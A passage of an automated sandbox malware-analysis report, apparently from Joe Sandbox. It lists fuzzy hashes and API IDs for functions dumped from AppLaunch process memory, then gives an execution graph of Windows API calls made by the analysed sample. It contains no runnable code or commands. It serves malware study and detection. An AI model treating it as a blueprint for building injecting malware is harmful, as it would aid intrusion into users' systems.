                                                                                                                                                                        • Opcode Fuzzy Hash: c5d5ccf393599d78ff4ce3cf0321e11fef0cf58f35058c5813aa5bde6c5c10d4
                                                                                                                                                                        • Instruction Fuzzy Hash: 0C1103B19042498FCB10CF9AD844BDEFBF8FB88224F548029E418A7640D739A945CFA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 09E3155C Relevance: 1.5, APIs: 1, Instructions: 25memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.934046378.0000000009E30000.00000040.00000010.sdmp, Offset: 09E30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9e30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                        • Opcode ID: 205adb6d242ed2078c4cb9d5a442b7cb5958cb12a40f214a3ca6080395b76037
                                                                                                                                                                        • Instruction ID: 74696ab9eeb2fa4b4eab2c7fb9643cf3d65d7b98ad3a19215c3a43ffd6bcc19d
                                                                                                                                                                        • Opcode Fuzzy Hash: 205adb6d242ed2078c4cb9d5a442b7cb5958cb12a40f214a3ca6080395b76037
                                                                                                                                                                        • Instruction Fuzzy Hash: 17F04F70904258DFCF318F54C9587D8BBB1BB18308F1084D9E64A67291C7B58ED4CF11
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 09E3169B Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.934046378.0000000009E30000.00000040.00000010.sdmp, Offset: 09E30000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_9e30000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                        • Opcode ID: ae49333e3d875f671af3082b50f3f8360256fc558aa53d232afa483d0a55ed65
                                                                                                                                                                        • Instruction ID: 27d2561d7e5b894b9bc2b2ad17cd10a3f8a2638c44092c23d589813c55630479
                                                                                                                                                                        • Opcode Fuzzy Hash: ae49333e3d875f671af3082b50f3f8360256fc558aa53d232afa483d0a55ed65
                                                                                                                                                                        • Instruction Fuzzy Hash: 5DF01774809258CFCB208B68C98C7D8BBB0AB15359F68D5CDE44AA7290C7B59DC9CF01
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 053CD4EC Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.931932943.00000000053CD000.00000040.00000001.sdmp, Offset: 053CD000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_53cd000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 260c7f0829c300d376eb356e8f03968b4c1ee14026661f187818e386b519e947
                                                                                                                                                                        • Instruction ID: 6c258c524425ab55abcf9d6fa33e2c453ee7e11de28568e328803bad3c869ecb
                                                                                                                                                                        • Opcode Fuzzy Hash: 260c7f0829c300d376eb356e8f03968b4c1ee14026661f187818e386b519e947
                                                                                                                                                                        • Instruction Fuzzy Hash: E621D671504284DFDB05DF50D9C0F66BF6AFB88328F2489BDE8050B646C376D856C7A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 053CD400 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.931932943.00000000053CD000.00000040.00000001.sdmp, Offset: 053CD000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_53cd000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 52ab50a41e3943be4781caecb06475e767804382ab70f18085eacc849259d498
                                                                                                                                                                        • Instruction ID: 503dd9ad0975c7b46546f33ffa569aac37c363e24e5d90bcc5faa833ae7c3526
                                                                                                                                                                        • Opcode Fuzzy Hash: 52ab50a41e3943be4781caecb06475e767804382ab70f18085eacc849259d498
                                                                                                                                                                        • Instruction Fuzzy Hash: 5A21D171504284DFCB04DF50D8C0B66BF6AFB88224F2489FDEA054E646CB76E866C7A1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 053DD0F4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.931967164.00000000053DD000.00000040.00000001.sdmp, Offset: 053DD000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_53dd000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 01e991a50938ebbf09559c2f5048e36157ddeaa9c3e5a21ff9a1492d24d6e93a
                                                                                                                                                                        • Instruction ID: 59e95231eb4d2f3d695f6d7b38b65e6047480b5fa53c7e3e3c44e85ababffe8b
                                                                                                                                                                        • Opcode Fuzzy Hash: 01e991a50938ebbf09559c2f5048e36157ddeaa9c3e5a21ff9a1492d24d6e93a
                                                                                                                                                                        • Instruction Fuzzy Hash: 0A21C2B6504244EFDB40DF54E8C4B6AFB7AFB84224F24C969E8094B646C37AD446CAB1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 053DD1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.931967164.00000000053DD000.00000040.00000001.sdmp, Offset: 053DD000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_53dd000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 006ac976db47554653f3d0ea07b4a970fa37fb21051b126451f1d17ed25cf039
                                                                                                                                                                        • Instruction ID: 6767e679659e57c5b6f7c63db710495cb256f4f13bebfadec8dacf944258ca36
                                                                                                                                                                        • Opcode Fuzzy Hash: 006ac976db47554653f3d0ea07b4a970fa37fb21051b126451f1d17ed25cf039
                                                                                                                                                                        • Instruction Fuzzy Hash: 2F21D372504204EFDB01CF50E9C0F26FBBAFB84314F24CD69E8094B641C776D846CA61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 053DD01C Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.931967164.00000000053DD000.00000040.00000001.sdmp, Offset: 053DD000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_53dd000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2a5cf24ec54588805e66208b0f13fa3b48565b256aa18bd2a647d477d7503959
                                                                                                                                                                        • Instruction ID: 6fd85c46d54c72f0b94b11e2174ee2fb9f0424edd49958316e5e16531429c4b8
                                                                                                                                                                        • Opcode Fuzzy Hash: 2a5cf24ec54588805e66208b0f13fa3b48565b256aa18bd2a647d477d7503959
                                                                                                                                                                        • Instruction Fuzzy Hash: 9421F272504244DFDB10DF10E9C4B6AFB7AFBC4224F64C969D80A0B645C376E447C671
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 053DD006 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.931967164.00000000053DD000.00000040.00000001.sdmp, Offset: 053DD000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_53dd000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a1c04f2627706eb6d834433d82f284a8ee287abb1bf594dd706e169db420c89e
                                                                                                                                                                        • Instruction ID: 84ab7d58556410546166d1ef4919cd4178f91dc747d5449d3b4efb50680de424
                                                                                                                                                                        • Opcode Fuzzy Hash: a1c04f2627706eb6d834433d82f284a8ee287abb1bf594dd706e169db420c89e
                                                                                                                                                                        • Instruction Fuzzy Hash: 8021A2765093C08FC712CF20D994B16FF71FB86224F29C5AAD8458B696C37AD44ACB62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 053CD3FB Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.931932943.00000000053CD000.00000040.00000001.sdmp, Offset: 053CD000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_53cd000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0b542bd3278c9900dffdafc875f4b96c8e5add24c359be4243397ba3ac3bd772
                                                                                                                                                                        • Instruction ID: 47d7a69629f507c36e2489b8167148b8426a35da34302340108bb91ea680bacb
                                                                                                                                                                        • Opcode Fuzzy Hash: 0b542bd3278c9900dffdafc875f4b96c8e5add24c359be4243397ba3ac3bd772
                                                                                                                                                                        • Instruction Fuzzy Hash: 6F11A276404680DFCB11CF10D5C4B16BF62FB84320F24C5EDE9054B656C37AD866CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 053CD4E7 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.931932943.00000000053CD000.00000040.00000001.sdmp, Offset: 053CD000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_53cd000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0b542bd3278c9900dffdafc875f4b96c8e5add24c359be4243397ba3ac3bd772
                                                                                                                                                                        • Instruction ID: 5a6032994349b9b3491cb512cda8ca23720138923bc64aaddeaca00964ee2b67
                                                                                                                                                                        • Opcode Fuzzy Hash: 0b542bd3278c9900dffdafc875f4b96c8e5add24c359be4243397ba3ac3bd772
                                                                                                                                                                        • Instruction Fuzzy Hash: 45119676504280DFCB15CF10D5C4B26BF72FB88324F24C5ADE8454B656C376D45ACB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 053DD0EF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.931967164.00000000053DD000.00000040.00000001.sdmp, Offset: 053DD000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_53dd000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 1cf331315f21bef1ddd9f1f7a189a899e1f7dc60603ca671fb2ef40e52cd521c
                                                                                                                                                                        • Instruction ID: bc0d4c745c35fc88bd00c262a8eb547777ec92511d07b75e2b2ee7bba6681fd9
                                                                                                                                                                        • Opcode Fuzzy Hash: 1cf331315f21bef1ddd9f1f7a189a899e1f7dc60603ca671fb2ef40e52cd521c
                                                                                                                                                                        • Instruction Fuzzy Hash: 91118276504280DFDB51CF14E9C4B25FB72FB84324F24C6AAD8494B646C37AD45ACBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 053DD1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.931967164.00000000053DD000.00000040.00000001.sdmp, Offset: 053DD000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_53dd000_AppLaunch.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: ad2a8cfca3367af31ed8fccdba65c6857044cb1be902d9aeec9971aaaa20cc2e
                                                                                                                                                                        • Instruction ID: f3f32751e276e459ac37451bee459a7bcc9fb44f07a31abbe02f2ba787d23bc3
                                                                                                                                                                        • Opcode Fuzzy Hash: ad2a8cfca3367af31ed8fccdba65c6857044cb1be902d9aeec9971aaaa20cc2e
                                                                                                                                                                        • Instruction Fuzzy Hash: 25119D76504280DFCB11CF10D5C4B25FBB2FB84324F28CAAED8494B696C37AD45ACB62
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:6.1%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:2.2%
                                                                                                                                                                        Total number of Nodes:1668
                                                                                                                                                                        Total number of Limit Nodes:50
                                                                                                                                                                        execution_graph 38104 40f843 18 API calls 38270 401645 16 API calls 38271 40c646 _wcsicmp _wcsicmp 38274 428e4f 13 API calls 38088 44464a 38091 444624 38088->38091 38090 444653 38092 444633 __dllonexit 38091->38092 38093 44462d _onexit 38091->38093 38092->38090 38093->38092 38276 424fc1 131 API calls 38277 433653 14 API calls 38278 403a51 memset wcscat _wtoi _wcsicmp 38280 413a55 44 API calls 38105 424fc1 153 API calls 38281 403256 27 API calls 38282 418257 GetSystemTimeAsFileTime 38284 441e5d 145 API calls 38107 40e45b memset memset _wcsicmp 38108 42a05e 150 API calls 38103 414c5e free 38285 444e5b FreeLibrary 38287 432261 141 API calls 38109 417062 FlushFileBuffers GetLastError 38288 440c01 19 API calls 38290 40ba65 11 API calls 36362 414266 EnumResourceNamesW 38292 42ee6a 149 API calls 38293 44126d 16 API calls 38110 42596d 128 API calls 38112 42570f memcpy memset memcpy memcpy memset 38113 40d86c 15 API calls 38114 424fc1 128 API calls 38116 443475 40 API calls 38117 440bfc 148 API calls 38117->38117 36203 428071 36204 428082 36203->36204 36208 429371 36203->36208 36206 4280c8 36204->36206 36207 4280cf 36204->36207 36219 424fc1 36204->36219 36205 42528a 36266 41607a 11 API calls 36205->36266 36240 41fa56 36206->36240 36268 41fb60 98 API calls 36207->36268 36236 425386 36208->36236 36273 41557c 11 API calls 36208->36273 36213 42598d 36267 423b6a 121 API calls 36213->36267 36214 425272 36214->36236 36260 41557c 11 API calls 36214->36260 36218 4292fd 36222 429316 36218->36222 36223 42934b 36218->36223 36219->36205 36219->36208 36219->36214 36219->36218 36224 422407 memset memcpy memcpy 36219->36224 36226 425951 36219->36226 36239 4252e8 36219->36239 36256 42210c memset memcpy 36219->36256 36257 4224a0 15 API calls 36219->36257 36258 422479 memset memcpy memcpy 36219->36258 36259 421f5c 13 API calls 36219->36259 36261 423b15 11 API calls 36219->36261 36262 423a53 91 API calls 36219->36262 36269 41557c 11 API calls 36222->36269 36228 429346 36223->36228 36271 41607a 11 API calls 36223->36271 36224->36219 36265 41557c 11 API calls 36226->36265 36272 423b6a 121 API calls 36228->36272 36229 42932a 36270 41607a 11 API calls 36229->36270 36239->36214 36263 421f5c 13 API calls 36239->36263 36264 421ffc 12 API calls 36239->36264 36241 41fa68 36240->36241 36244 41fa6d 36240->36244 36283 41dd82 98 API calls 36241->36283 36243 41fa7e 36243->36219 36244->36243 36245 41fb45 36244->36245 36246 41facf 36244->36246 36245->36243 36249 41f67a 87 API calls 36245->36249 36247 41fad4 36246->36247 36248 41faf8 36246->36248 36274 41f4f7 36247->36274 36248->36243 36253 41fb1b 36248->36253 36280 41f568 36248->36280 36249->36243 36253->36243 36255 41fa56 98 API calls 36253->36255 36255->36243 36256->36219 36257->36219 36258->36219 36259->36219 36260->36205 36261->36219 36262->36219 36263->36239 36264->36239 36265->36205 36266->36213 36267->36236 36268->36219 36269->36229 36270->36228 36271->36228 36272->36208 36273->36205 36275 41f514 36274->36275 36276 41f50d 36274->36276 36288 41e742 36275->36288 36279 41f555 36276->36279 36298 443a0d 11 API calls 36276->36298 36279->36243 36284 41f67a 36279->36284 36281 41e787 87 API calls 36280->36281 36282 41f579 36281->36282 36282->36248 36283->36244 36286 41f681 36284->36286 36285 41f6c7 36285->36243 36286->36285 36287 41f4f7 87 API calls 36286->36287 36287->36286 36289 41e75d 36288->36289 36290 41e74e 36288->36290 36299 41e6c9 36289->36299 36302 443a0d 11 API calls 36290->36302 36293 41e758 36293->36276 36296 41e774 36296->36293 36304 41e787 36296->36304 36298->36279 36308 41b76d 36299->36308 36302->36293 36303 41e4a1 11 API calls 36303->36296 36305 41e794 36304->36305 36306 41e78c 36304->36306 36305->36293 36361 41b8b4 87 API calls 36306->36361 36309 41b78a 36308->36309 36310 41b77a 36308->36310 36315 41b7a7 36309->36315 36340 41857e memset memset 36309->36340 36339 443a0d 11 API calls 36310->36339 36312 41b784 36312->36293 36312->36303 36314 41b855 36343 443a0d 11 API calls 36314->36343 36315->36312 36315->36314 36317 41b7ec 36315->36317 36327 41b802 36315->36327 36319 41b80b 36317->36319 36321 41b7fd 36317->36321 36323 41b81c 36319->36323 36319->36327 36320 41b83f memset 36320->36312 36329 41a52e 36321->36329 36322 41b82f 36342 419b3e memset memcpy memset 36322->36342 36323->36320 36323->36322 36341 418388 memset memcpy memset 36323->36341 36327->36312 36344 419d6e 87 API calls 36327->36344 36328 41b83b 36328->36320 36330 41a55a memset 36329->36330 36331 41a56d 36329->36331 36338 41a5f4 36330->36338 36333 41a585 36331->36333 36345 41d530 19 API calls 36331->36345 36334 41a5bc 36333->36334 36346 414ac6 36333->36346 36336 41a5e8 memcpy 36334->36336 36337 41a5db memset 36334->36337 36334->36338 36336->36338 36337->36338 36338->36327 36339->36312 36340->36315 36341->36322 36342->36328 36343->36327 36345->36333 36349 416f08 36346->36349 36357 416e8b SetFilePointer 36349->36357 36352 416f25 ReadFile 36353 416f52 36352->36353 36354 416f42 GetLastError 36352->36354 36355 414adc 36353->36355 36356 416f59 memset 36353->36356 36354->36355 36355->36334 36356->36355 36358 416eb7 GetLastError 36357->36358 36359 416ecd 36357->36359 36358->36359 36360 416ec3 GetLastError 36358->36360 36359->36352 36359->36355 36360->36359 36361->36305 38119 414c77 12 API calls 38296 440c04 177 API calls 38120 402877 7 API calls 38297 43427a 16 API calls 38298 42ca7b 17 API calls 38121 40547a 28 API calls 38123 418c7d memset 38299 440c04 151 API calls 38094 444e7a 38095 444e83 ??3@YAXPAX 38094->38095 38096 444e8a 38094->38096 38095->38096 38097 444e93 ??3@YAXPAX 38096->38097 38098 444e9a 38096->38098 38097->38098 38099 444ea3 ??3@YAXPAX 38098->38099 38100 444eaa 38098->38100 38099->38100 38101 444eb3 ??3@YAXPAX 38100->38101 38102 444eba 38100->38102 38101->38102 38302 42a67d 151 API calls 38303 441dfc 165 API calls 38304 414a04 17 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38124 42d004 164 API calls 38126 441c02 144 API calls 38127 43440b 16 API calls 38309 40b60e 7 API calls 38310 414e11 DeleteCriticalSection 38129 424fc1 127 API calls 38312 42ca17 19 API calls 38130 428c0c 35 API calls 38313 42da14 148 API calls 38131 418c18 12 API calls 38074 414c1d malloc 38075 414c45 38074->38075 38076 414c38 38074->38076 38078 41607a 11 API calls 38075->38078 38078->38076 38314 441a19 149 API calls 38315 424fc1 127 API calls 38132 40181f DefWindowProcW ??2@YAPAXI memset memcpy ??3@YAXPAX 38133 424fc1 133 API calls 38316 444625 _onexit 38318 414e20 EnterCriticalSection 38319 42596d 122 API calls 38135 404c2d 9 API calls 38323 414e2f LeaveCriticalSection 36202 442235 19 API calls 38136 41b030 105 API calls 38137 441437 19 API calls 38325 444633 __dllonexit 38326 414639 memset SHGetPathFromIDListW SendMessageW 38327 444e39 ??3@YAXPAX 38328 404ac0 32 API calls 38329 40b6c2 8 API calls 38141 40ccc5 memset _snwprintf SendMessageW 38331 42ca88 16 API calls 38143 424fc1 129 API calls 38336 441edd 12 API calls 38145 4448df _XcptFilter 38146 40f4dd 34 API calls 38147 4014df 17 API calls 36184 4174e0 36185 41757c 36184->36185 36186 4174f5 36184->36186 36186->36185 36187 417511 UnmapViewOfFile CloseHandle 36186->36187 36188 417547 36186->36188 36191 416ed2 36186->36191 36187->36186 36187->36187 36188->36186 36196 417e39 20 API calls 36188->36196 36192 416ef1 FindCloseChangeNotification 36191->36192 36193 416ee3 36192->36193 36194 416efa 36192->36194 36193->36194 36195 416ee9 Sleep 36193->36195 36194->36186 36195->36192 36196->36188 38148 441ce5 8 API calls 38149 440ce7 148 API calls 38340 417ee5 17 API calls 38341 443eef 8 API calls 38151 4178f0 86 API calls 38152 4448f3 _exit _c_exit 38345 40aa82 27 API calls 38346 440c04 24 API calls 38347 403a84 memset wcscat wcslen memcpy _wcsicmp 38154 44148c 14 API calls 38154->38154 38348 428a8e 15 API calls 38350 41828c 27 API calls 38155 40188e ExitProcess 38352 440c04 141 API calls 38159 402899 19 API calls 38354 40e29c 30 API calls 38355 43369e 16 API calls 38160 40109f 42 API calls 38357 424fc1 156 API calls 38359 4036a3 16 API calls 38162 4330a4 20 API calls 38360 424fc1 127 API calls 38164 4050af 49 API calls 38167 4410b7 18 API calls 38366 40a6bd wcslen wcslen 38368 440b47 168 API calls 38368->38368 38173 414147 8 API calls 38370 440f42 15 API calls 38174 441d4c memset memset 38372 413f4b 9 API calls 38177 40154b memcpy memcpy GetModuleHandleW DialogBoxParamW 38179 414d4e InterlockedCompareExchange InitializeCriticalSection Sleep 38373 41774e 24 API calls 38181 433556 17 API calls 38375 40cb5a 15 API calls 38182 40155b 6 API calls 38376 425272 140 API calls 38183 440959 140 API calls 38378 431b5d 14 API calls 38379 433b5d 13 API calls 38380 440b64 12 API calls 38184 440c01 14 API calls 38381 403763 modf 38382 417366 21 API calls 38385 424fc1 127 API calls 38386 40eb6d 159 API calls 38387 441b69 143 API calls 38387->38387 38185 405573 9 API calls 38389 416f77 SetFilePointer GetLastError GetLastError WriteFile GetLastError 38390 43437b 21 API calls 38186 42857d 139 API calls 38187 414100 WritePrivateProfileStringW 38392 433701 memset memcpy 38191 40a908 10 API calls 38192 41290b 7 API calls 38193 440c04 15 API calls 38196 44090a 13 API calls 38395 417314 LockFile UnlockFile 38396 402316 20 API calls 38200 404d17 SendDlgItemMessageW SendDlgItemMessageW SetDlgItemTextW GetDlgItemTextW 38397 401717 10 API calls 38398 42db18 16 API calls 38079 41411d 38082 413e1e 38079->38082 38081 41413d 38083 413e2a 38082->38083 38084 413e3c GetPrivateProfileIntW 38082->38084 38087 413cae memset _itow WritePrivateProfileStringW 38083->38087 38084->38081 38086 413e37 38086->38081 38087->38086 38400 440f1a 16 API calls 38402 40bb24 18 API calls 38404 40df25 8 API calls 36384 44472e 36403 44493c 36384->36403 36386 44473a GetModuleHandleA 36387 44474a __set_app_type __p__fmode __p__commode 36386->36387 36389 4447de 36387->36389 36390 4447e6 __setusermatherr 36389->36390 36391 4447f2 36389->36391 36390->36391 36404 44492a _controlfp 36391->36404 36393 4447f7 _initterm __wgetmainargs _initterm 36394 444858 GetStartupInfoW 36393->36394 36395 44484a 36393->36395 36397 4448a0 GetModuleHandleA 36394->36397 36405 40ff55 36397->36405 36401 4448d7 _cexit 36401->36395 36402 4448d0 exit 36402->36401 36403->36386 36404->36393 36406 40ff65 36405->36406 36448 403c8c LoadLibraryW 36406->36448 36408 40ff6d 36409 40ff71 36408->36409 36457 4144ab 36408->36457 36409->36401 36409->36402 36412 40ffb0 36461 40fc4e memset ??2@YAPAXI 36412->36461 36419 40fffb 36493 40beb0 memset 36419->36493 36420 41000f 36498 40bd12 memset 36420->36498 36423 41000a 36518 40fd9e ??3@YAXPAX DeleteObject 36423->36518 36425 4092bc _wcsicmp 36426 410025 36425->36426 36426->36423 36430 41004b CoInitialize 36426->36430 36503 40fe76 36426->36503 36428 41014e 36519 408d9f free free 36428->36519 36517 40fbd2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 36430->36517 36431 410157 36520 40b1bf 36431->36520 36434 41005b ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 36440 41013f CoUninitialize 36434->36440 36445 4100b2 36434->36445 36440->36423 36441 4100b8 TranslateAcceleratorW 36442 410129 GetMessageW 36441->36442 36441->36445 36442->36440 36442->36441 36443 4100f1 IsDialogMessageW 36443->36442 36443->36445 36444 4100e5 IsDialogMessageW 36444->36442 36444->36443 36445->36441 36445->36443 36445->36444 36446 410113 TranslateMessage DispatchMessageW 36445->36446 36447 410107 IsDialogMessageW 36445->36447 36446->36442 36447->36442 36447->36446 36449 403cb7 GetProcAddress 36448->36449 36450 403cdf #17 36448->36450 36452 403cd0 FreeLibrary 36449->36452 36453 403cc7 36449->36453 36451 403ce8 36450->36451 36454 403d06 36451->36454 36455 403cef MessageBoxW 36451->36455 36452->36450 36456 403cdb 36452->36456 36453->36452 36454->36408 36455->36408 36456->36451 36458 4144b4 LoadLibraryW 36457->36458 36459 40ff7c SetErrorMode GetModuleHandleW EnumResourceTypesW 36457->36459 36458->36459 36460 4144c8 GetProcAddress 36458->36460 36459->36412 36460->36459 36462 40fcc9 36461->36462 36463 40fcee ??2@YAPAXI 36462->36463 36464 40fd05 36463->36464 36466 40fd0a 36463->36466 36532 40c05b memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 36464->36532 36467 40fd42 36466->36467 36468 40fd35 DeleteObject 36466->36468 36524 40837b 36467->36524 36468->36467 36470 40fd47 36527 401000 36470->36527 36474 40fd95 36475 40913b 36474->36475 36534 408d9f free free 36475->36534 36479 408ee8 malloc memcpy free free 36481 409176 36479->36481 36480 409265 36488 409290 36480->36488 36558 408ee8 36480->36558 36481->36479 36481->36480 36483 409201 free 36481->36483 36481->36488 36538 408dc5 36481->36538 36550 4080ac 36481->36550 36483->36481 36487 408dc5 7 API calls 36487->36488 36535 408f1e 36488->36535 36489 4092bc 36490 4092e3 36489->36490 36492 4092c4 36489->36492 36490->36419 36490->36420 36491 4092cd _wcsicmp 36491->36490 36491->36492 36492->36490 36492->36491 36563 40be89 36493->36563 36495 40bee3 GetModuleHandleW 36568 40bd50 36495->36568 36499 40be89 3 API calls 36498->36499 36500 40bd42 36499->36500 36641 40bc8a 36500->36641 36655 403360 36503->36655 36505 40ff4e 36505->36423 36505->36430 36506 40febb _wcsicmp 36507 40fe90 36506->36507 36507->36505 36507->36506 36509 40fef2 36507->36509 36686 40fde0 7 API calls 36507->36686 36509->36505 36658 40f2f9 36509->36658 36511 40ff00 36671 40e903 36511->36671 36513 40ff0e 36514 40dd37 39 API calls 36513->36514 36515 40ff40 36514->36515 36516 40f4b1 14 API calls 36515->36516 36516->36505 36517->36434 36518->36428 36519->36431 36521 40b1c5 free 36520->36521 36522 40b1cc 36520->36522 36521->36522 36523 408d9f free free 36522->36523 36523->36409 36533 4082b5 memset wcscpy 36524->36533 36526 408392 CreateFontIndirectW 36526->36470 36528 401037 36527->36528 36529 40103b GetModuleHandleW LoadIconW 36528->36529 36530 40100e wcsncat 36528->36530 36531 401802 wcscpy 36529->36531 36530->36528 36531->36474 36532->36466 36533->36526 36534->36481 36536 408f24 free 36535->36536 36537 408f2e 36535->36537 36536->36537 36537->36489 36539 408de0 36538->36539 36540 408dd4 wcslen 36538->36540 36541 408e04 36539->36541 36542 408dfb free 36539->36542 36540->36539 36544 4080ac 3 API calls 36541->36544 36543 408e0e 36542->36543 36545 408e27 36543->36545 36546 408e1e free 36543->36546 36544->36543 36548 4080ac 3 API calls 36545->36548 